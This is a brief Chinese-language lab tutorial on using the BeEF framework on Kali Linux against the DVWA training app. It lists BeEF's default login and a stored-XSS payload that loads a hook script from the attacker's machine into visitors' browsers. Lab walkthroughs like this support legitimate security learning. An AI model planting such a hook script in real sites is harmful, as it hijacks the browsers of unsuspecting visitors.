kali BEEF的xss注入简单应用(DVWA)
BEEF启动:
kali命令行输入:beef-xss 启动BEEF
本地或远程访问:http://192.168.10.102"3000/ui/panel
默认username和password均为:beef
主机上线:
复制Example,
<script src="http://127.0.0.1:3000/hook.js"></script>
将里面的127.0.0.1修改为kali网络地址(ifconfig 查询),例:
<script src="http://192.168.10.102:3000/hook.js"></script>
将此链接粘贴到存在xss漏洞的注入点上:(DVWA存储型漏洞)
点击“sign gusetbook”,
查看到上线的主机。
更多学习:
Beefxss使用教程图文教程(超详细)